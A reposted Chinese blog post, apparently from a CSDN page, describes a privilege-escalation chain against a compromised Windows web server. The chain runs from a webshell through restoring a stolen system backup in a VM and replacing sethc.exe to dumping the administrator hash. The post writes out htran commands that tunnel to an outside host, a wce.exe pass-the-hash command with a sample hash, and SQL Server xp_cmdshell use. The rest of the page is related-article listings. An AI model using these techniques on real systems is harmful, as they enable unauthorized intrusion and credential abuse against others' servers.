另类提权 虚拟机还原备份文件抓hash

最新推荐文章于 2024-09-27 21:41:13 发布
最新推荐文章于 2024-09-27 21:41:13 发布
阅读量780 收藏
点赞数
分类专栏: 提权 文章标签: 虚拟机 sql server sql windows 破解 blog
 
猪三哥那看到的,再次验证渗透玩的是思路,学习下
 
  
 
一頭豬,搞到WEBSHELL~補丁很全,無神馬缺陷,裝了個微軟FTP,SQL2005,常規辦法無法提權,~一看D盤有一個前天的系統BKF文件~啊哦~COPY 到WEB 目錄下回來~裝個虛擬豬還原BKF文件~稍等片刻之後,虛擬豬就變成目標豬的系統了~無密碼登入呢~插入WINPE光盤~替換sethc.exe ,重啟,按5次shift,新建帳號進入~抓hash,不幸的是超過14位,無法破解~等死嗎?肯定不能啦~既然有目標豬的hash了,還能死嗎?
OK,本地執行htran -s -listen 1234 5200,webshell執行htran -s -connect 222.222.222.222 1234
當然了,目標豬是可以上網的,OK 得到一條SOCK5代理,222.222.222.222:5200
本地設置ProxyCap允許所有程序通過此代理連接,然後wce.exe -s administrator:zhu:00000000000000000000000000000000:4A59CF37F6A2307D14ABA1921E8BBFE6 替換HASH
不要想著直接ipc,即使設置所有程序通過代理連接,也掛不到系統核心的那些XX程式,打開SQL Server Management Studio,填寫目標豬IP,選擇WINDOWS認證,OK,成功登陸目標的SQL,然後就是神馬exec master..xp_cmdshell 神馬豬的了~

摘自 RoGe's Blog 
fengling132
关注
专栏目录
VMware里建立虚拟机快照(带图详解)
ly_qiu的博客
02-12 1万+
VMware里建立虚拟机快照(带图详解) 创建快照 如下图所示,想要创建快照有两种方法 可以自行修改名称和描述,修改好之后电机“拍摄快照”即可 此时大家可以看一下自己的快照是否建立成功 我所理解的快照就是,先拍摄一个所有状态,环境都良好的快照,在之后如果操作不当使得虚拟机受损无法正常使用的时候就可以还原到快照所在状态。对于作为新手的我来说,是一个很有用的东西。 ...
程序员编程笔记
weixin_40789007的博客
09-20 4609
1.查看电脑当前进程和端口cmd netstat -pid netstat -a 查看全部端口信息:netstat –ano 2.创建文件夹 mkdir 文件名或文件路径 3.删除文件夹 rmdir 4.删除文件 del 5.打开计算机calc 6.打开画图mspaint 7.用echo "写入新数据">d:\a.txt,echo 字符串 >文件路径 文件名(会覆盖原内容) 8.用echo "写入新数据">>d:\a.txt,echo 字符串 >文件路径 文件名.
其他常见虚拟主机提权 - cracer_CSDN
m0_67888657的博客
07-15 80
找找有木有winwebmail ,这个东西有的 zkeys 装了,有的没装,如果找到这东西直接去他目录写个 shell,权限就比之前大了,exp 也能提了。如果你有目标站,大可不必第一选择提权,可以首先找到目标在目录,通过一些手段获得目标站的shell或者数据库信息等,直到拿到目标在权限~~~虚拟主机提权遵循的原则是尽可能的搜集信息,一般是从注册表,虚拟主机管理系统的数据库,敏感目录,备份文件,日志信息等中搜集!不过值得庆贺的一点,国内的网管都喜欢通用密码,一般拿到 root 密码 社到管理的账号。
利用sethc.exe粘滞键文件破解密码进系统小健
runus
01-20 1382
利用sethc.exe粘滞键文件破解密码进系统小健 发表于 系统 | 2010年5月13日 13:45:45 | 浏览:264 | 我要当猩猩 评论:(3)今天安装系统遇到非常棘手的问题,一台笔记本,光驱坏了,不能光驱启动,没有USB启动,进系统的时候,要求输入密码,而我密码却不知道,进不去系统。 请问你怎么破掉密码进系统? 或者重装安装XP系统? 方法是人想出来的,于是我开始研究,...
备份和恢复(一)
08-01 91
--------------------------------------------------------------------归档模式和非归档模式:SQL> conn sys/sys@limm as sysdba...
从VMware的vCenter中读取事件
刚毅的博客
10-19 2642
从VMware的vCenter中读取事件,每几分钟从vCenter中的事件管理中读取事件,得到事件后,再对事件做处理。上代码。 连接vCenter的连接类 import java.net.MalformedURLException; import java.net.URL; import java.util.HashMap; import java.util.Map; import ja...
渗透测试 ( 1 ) --- 必备 工具、导航
墨鱼菜鸡
07-11 3096
From:https://zhuanlan.zhihu.com/p/401413938 渗透测试实战教学:https://www.zhihu.com/column/c_1334810805263515648 导航类网站: 渗透师网络安全从业者安全导航(速查小手册)--- 渗透师导航:https://www.shentoushi.top/安全圈 in...
Hadoop
weixin_44223683的博客
01-08 4813
Hadoop大数据生态系统 实验教程 第1章 欢迎来到大数据的世界 1.1 拥抱大数据 当今的社会,是一个信息大爆炸的社会,社会在高速发展,科技发达,信息流通,人们之间的交流越来越密切,生活也越来越方便,大量的数据在这个高科技时代快速产生。大数据到底有多大?一组名为“互联网上一天”的数据告诉我们,一天之中,互联网产生的全部内容可以刻满1.68亿张DVD;发出的邮件有2940亿封之多(相当于美国两年...
java
fanfan12138的博客
05-21 2566
视频网站 https://edu.51cto.com/lecturer/2086101.html 网址 https://blog.csdn.net/zhangchen124 1 Java 面试宝典 2020 版 前言…13 一. Java 基础部分…14 1、一个".java"源文件中是否可以包括多个类(不是内部类)?有什么限制? …14 2、Java 有没有 goto?..14 3、说说&和&&的区别。 …14 4、switch 语句能否作用在 byte 上,能否作用在 long
journaling-hash:可以将自身备份到文件并重建自身的不可变哈希
06-29
可以将自身备份到文件并重建自身的不可变哈希 “我被打倒了,但我又起来了”——威廉·莎士比亚 快速使用 npm install journaling-hash 这是一个简单的示例,每次运行时都会增加number_of_cookies 。 如果它在增加...
oracle vm 文件复制,Oracle VM VirtualBox虚拟机怎么实现与主机之间的文件拖动
weixin_42295892的博客
04-06 5554
点击查看Oracle VM VirtualBox虚拟机怎么实现与主机之间的文件拖动具体信息答:进入那个系统之后 点Right_Ctrl+D有一个安装增强功能。 然后相当于一个安装增强系统的光盘插到虚拟电脑里去了。用那个东东安装了增强系统之后会方便得多了。 拖动文件好像不行,得用U盘。但这样可以复制文本到主机里粘贴。答:Oracle VM VirtualBox是不能文件拖拽的,这是处于安全考虑的。 ...
NFS共享存储下的KVM虚拟机磁盘备份机制
NFS共享存储允许用户在不同机器之间共享文件,使得文件可以在网络上像在本地文件系统中一样访问和操作。NFS的优势包括: - **数据共享**: 多个主机可以通过共享的方式访问同一份数据,方便实现数据共享和协作。 - **...
python文件夹自动备份,一个Python程序,可以帮助您自动备份文件
weixin_31833039的博客
03-26 1593
丢失或删除的文件是一种常见现象。为谨慎起见,要确保文件/文件夹的安全性,需要我们经常进行备份。为了避免不出现这样恢复的苦差事,最好自动化这个过程。本文作者为这种情况创建了一个Python脚本程序。我们经常在计算机中创建新文档,文件和文件夹。有时会意外或错误地删除文档。我们花了不少时间在上面做了一个重要的演示文档。但一不小心,计算机硬盘崩溃了。这是一个很棘手的问题。人们也会经常备份文件。但是每隔一小...
SQL 查询优化与实战
qq_63170044的博客
09-26 968
SQL 查询优化不仅仅是提高系统性能的重要手段,更是确保数据库在高并发环境下稳定运行的核心技能。通过合理使用索引、优化。
渗透测试工具 sqlmap 基础教程
2301_77160226的博客
09-25 775
一旦发现漏洞,sqlmap 可以自动利用漏洞获取数据库中的敏感信息,甚至可以获取数据库服务器的操作系统权限。sqlmap 是一款非常强大的渗透测试工具,它可以帮助我们快速检测和利用 SQL 注入漏洞。在使用 sqlmap 进行渗透测试时,一定要遵守法律法规,确保获得了合法的授权,并注意不要对目标系统造成过大的影响。在网络安全领域,渗透测试是一项至关重要的工作,它可以帮助我们发现系统中的安全漏洞,从而采取相应的措施进行修复。2.在 Windows 系统中,可以从 sqlmap 的官方网站下载安装包进行安装。
PostgreSQL 17新特性merge语法增强
最新发布
zxrhhm的博客
09-27 543
merge语法增强,支持 RETURNING 子句,可以返回新增、更新或者删除的数据行
[EBPF] 实时捕获DM数据库是否存在SQL阻塞
飞奔的屎壳郎
09-27 920
名称版本linux版本(centos8.5)DM88.1.4.27python利用ebpf技术在不登录数据库的情况下,通过对数据库的函数添加钩子,实时的对数据库是否存在阻塞判断现有的监控逻辑都是新建数据库用户执行SQL语句来判断阻塞情况,告警的实时性取决于监控的周期频率,而使用ebpf技术能够解决这个痛点ebpf有多种实现方式,这里便于理解测试的话 使用python语言内置c语言的形式进行了说明。涉及到生产环境应该是使用go语言或者c语言去做能够有效避免源码泄露等问题。
hive/impala/mysql几种数据库的sql常用写法和函数说明
biqidaoer的专栏
09-27 309
做大数据开发的时候,会在几种库中来回跳,同一个需求,不同库函数和写法会有出入,在此做汇总沉淀。
vue3 打包文件增加hash
09-07
在Vue 3中,为打包文件增加hash值主要是为了实现缓存控制,当文件内容发生变化时,文件的名称也会随之变化,从而使得浏览器重新加载新内容而不是从缓存中读取。在Vue CLI创建的项目中,可以通过修改构建配置来实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值